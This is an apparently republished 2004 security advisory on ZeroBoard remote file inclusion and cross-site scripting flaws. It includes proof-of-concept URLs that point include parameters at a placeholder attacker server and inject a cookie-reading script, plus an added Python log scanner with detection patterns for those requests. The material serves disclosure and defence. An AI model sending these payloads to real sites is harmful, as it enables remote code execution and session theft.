
STG Security Advisory 2004-12-20.16

31 Dec 2004 | Reported by STG Security | Source: packetstormsecurity.com

Security advisory on ZeroBoard: two PHP remote file inclusion flaws that allow arbitrary command execution as the HTTPD user, plus a cross-site scripting flaw.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site  
scripting vulnerabilities in ZeroBoard  
  
Revision 1.2  
Date Published: 2004-12-20 (KST)  
Last Update: 2004-12-24  
Disclosed by SSR Team ([email protected])  
  
Summary  
=======  
ZeroBoard is one of the most widely used web BBS applications in Korea.  
However, input validation flaws allow attackers to run arbitrary commands  
with the privileges of the HTTPD process, which typically runs as the  
nobody user.  
  
  
Vulnerability Class  
===================  
Implementation Error: Input validation flaw  
  
Impact  
======  
High: arbitrary command execution.  
  
Affected Products  
=================  
ZeroBoard 4.1pl4 and prior  
  
Vendor Status: NOT FIXED  
========================  
2004-11-20 Vulnerabilities found.  
2004-11-20 1st vendor contact; no reply.  
2004-11-22 2nd vendor contact; no reply.  
2004-12-13 STG Security, Inc. customers notified.  
2004-12-24 Official release.  
  
Details  
=======  
Vulnerability 1 : PHP source injection vulnerability  
- - ------------------------------------  
- - - Proof of concept  
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/  
  
- - - Environment  
PHP 5.0.x (file_exists() accepts URL wrappers only from 5.0.0 on)  
php.ini : register_globals = On  
php.ini : allow_url_fopen = On (the PHP default; required for include of a remote URL)  
  
- - - Description  
As of PHP 5.0.0, file_exists() can be used with URL wrappers that support  
stat(), such as ftp:// (see http://www.php.net/manual/en/function.file-exists.php).  
With register_globals = On the _zb_path parameter of outlogin.php is taken  
directly from the query string. An attacker who points it at an FTP server  
hosting a lib.php passes the file_exists() check, and the following include  
of $_zb_path."_head.php" fetches and executes the attacker's _head.php with  
the privileges of the HTTPD process. On PHP 4 the file_exists() check fails  
for a URL and blocks this path.  
  
- - - Part of vulnerable source, outlogin.php.  
- - ----  
// check that this is a ZeroBoard directory  
if(!file_exists($_zb_path."lib.php")) {  
echo "Not a ZeroBoard directory";  
return;  
}  
  
// read _head.php  
@include $_zb_path."_head.php";  
  
}  
- - ----  
  
Vulnerability 2 : PHP source injection vulnerability  
- - ------------------------------------  
- - - Proof of concept  
http://[victim]/include/write.php?dir=http://[attacker]/  
  
  
- - - Environment  
php.ini: register_globals = On  
php.ini: allow_url_fopen = On (the PHP default; required for include of a remote URL)  
  
- - - Reason  
$dir is never initialized in include/write.php. With register_globals = On  
an attacker sets it from the query string, and include $dir."/write.php"  
then fetches and executes write.php from the attacker's web server. There is  
no file_exists() check in this path.  
  
  
- - - Part of vulnerable source, include/write.php  
- - ----  
include $dir."/write.php";  
- - ----  
  
Vulnerability 3 : Cross-site scripting vulnerability  
- - --------------------------------------  
- - - Proof of concept  
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</script>  
  
  
- - - Reason  
check_user_id.php echoes the user_id value back into the page without  
HTML-escaping it, so script supplied in user_id runs in the visitor's browser.  
  
- - - Part of vulnerable source, check_user_id.php  
- - ----  
$user_id = trim($user_id);  
... omitted ...  
if($check[0]) echo "$user_id is already a registered<br> ID";  
else echo "$user_id is available";  
... omitted ...  
- - ----  
  
  
Workaround  
==========  
Until official patches for these vulnerabilities are available, modify the  
vulnerable sources as follows. Note that the checks for vulnerabilities 1  
and 2 only reset a value that contains a URL scheme separator ("://"), which  
stops the remote inclusion described above; they do not otherwise validate  
the path, so also consider setting register_globals = Off and  
allow_url_fopen = Off in php.ini.  
  
Vulnerability 1: As of zboard 4.1pl4  
- - ----------------------------  
Insert the following code at 59th line of outlogin.php,  
  
if(eregi(":\/\/",$_zb_path)) $_zb_path="";  
  
  
Vulnerability 2: As of zboard 4.1pl4  
- - ----------------------------  
Insert the following code at 15th line of include/write.php,  
  
if(eregi(":\/\/",$dir)) $dir="";  
  
  
Vulnerability 3: As of zboard 4.1pl4  
- - ----------------------------  
Insert the following code at 3rd line of check_user_id.php,  
  
$user_id = htmlspecialchars(trim($user_id));  
  
  
Credits  
=======  
Jeremy Bae at STG Security  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.0  
  
iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM  
awAFdddxTNRwEEy4vyUuxre9  
=kiqS  
-----END PGP SIGNATURE-----  
  
  
`
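Detection logic for the three proof-of-concept requests listed under Details, together with a check of what the eregi(":\/\/") test from the Workaround section would and would not stop. This is an added example, not code from STG Security or ZeroBoard: the script names and parameter names (_zb_path, dir, user_id) come from the advisory, the Apache access-log lines and the IP addresses in them are constructed for this example, and the directory-traversal check goes beyond what the advisory describes.

```python
"""
Scan Apache access-log lines for the ZeroBoard request patterns described in
SSA-20041220-16: a URL wrapper in _zb_path (outlogin.php) or dir
(include/write.php), and markup in user_id (check_user_id.php).

Added example, not code from STG Security or ZeroBoard.  The log lines and
IP addresses below are constructed; the traversal check is an extension of
the advisory's own URL-wrapper check.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# (script name, parameter, how the script uses it) from the advisory.
# "path" values are passed to include; "echo" values are echoed unescaped.
WATCH = [
    ("/outlogin.php", "_zb_path", "path"),
    ("/include/write.php", "dir", "path"),
    ("/check_user_id.php", "user_id", "echo"),
]

# Any PHP stream-wrapper prefix: ftp://, http://, https://, php://, ...
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# A '..' path component (local traversal; not caught by the advisory's check).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Tag-like markup in a value the page echoes verbatim.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)

# Apache common/combined log format: client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log: the three PoC requests, one traversal attempt,
# and two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Dec/2004:10:15:01 +0900] "GET /bbs/outlogin.php?_zb_path=ftp://198.51.100.9/pub/ HTTP/1.1" 200 512
203.0.113.7 - - [20/Dec/2004:10:15:05 +0900] "GET /bbs/include/write.php?dir=http://198.51.100.9/ HTTP/1.1" 200 318
203.0.113.8 - - [20/Dec/2004:10:16:44 +0900] "GET /bbs/check_user_id.php?user_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 220
203.0.113.9 - - [20/Dec/2004:10:17:10 +0900] "GET /bbs/outlogin.php?_zb_path=../../../../etc/ HTTP/1.1" 200 301
198.51.100.20 - - [20/Dec/2004:10:18:00 +0900] "GET /bbs/check_user_id.php?user_id=alice HTTP/1.1" 200 64
198.51.100.21 - - [20/Dec/2004:10:18:30 +0900] "GET /bbs/zboard.php?id=notice HTTP/1.1" 200 4120
"""


def advisory_workaround_blocks(value: str) -> bool:
    """Mirror of the advisory's eregi(":\\/\\/", ...) test: True when the
    workaround would reset the value.  It only recognises URL wrappers."""
    return "://" in value


def classify_value(param: str, value: str, kind: str) -> Optional[str]:
    """Label one parameter value: remote-include, traversal, xss, or None."""
    v = unquote(value)  # decode once more so double-encoded values are caught
    if kind == "path":
        if WRAPPER_RE.match(v):
            return f"remote-include:{param}"
        if TRAVERSAL_RE.search(v):
            return f"traversal:{param}"
    elif kind == "echo" and MARKUP_RE.search(v):
        return f"xss:{param}"
    return None


def inspect_request(target: str) -> list:
    """Return finding labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = []
    for script, param, kind in WATCH:
        # Match on the script name so any install prefix (/bbs/, /zboard/) works.
        if not parts.path.endswith(script):
            continue
        for name, value in params:
            if name == param:
                label = classify_value(param, value, kind)
                if label:
                    findings.append(label)
    return findings


def scan_log(lines) -> list:
    """Parse access-log lines; return one record per request that has findings."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append({"client": m.group("client"),
                         "target": m.group("target"),
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["client"], hit["findings"], hit["target"])
```

Run against the constructed sample, the scanner flags the three PoC requests and the traversal attempt and ignores the two benign lines. advisory_workaround_blocks() returns True for the ftp:// and http:// values but False for the traversal value, which is the gap the Workaround note points at: the eregi test stops remote inclusion only.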
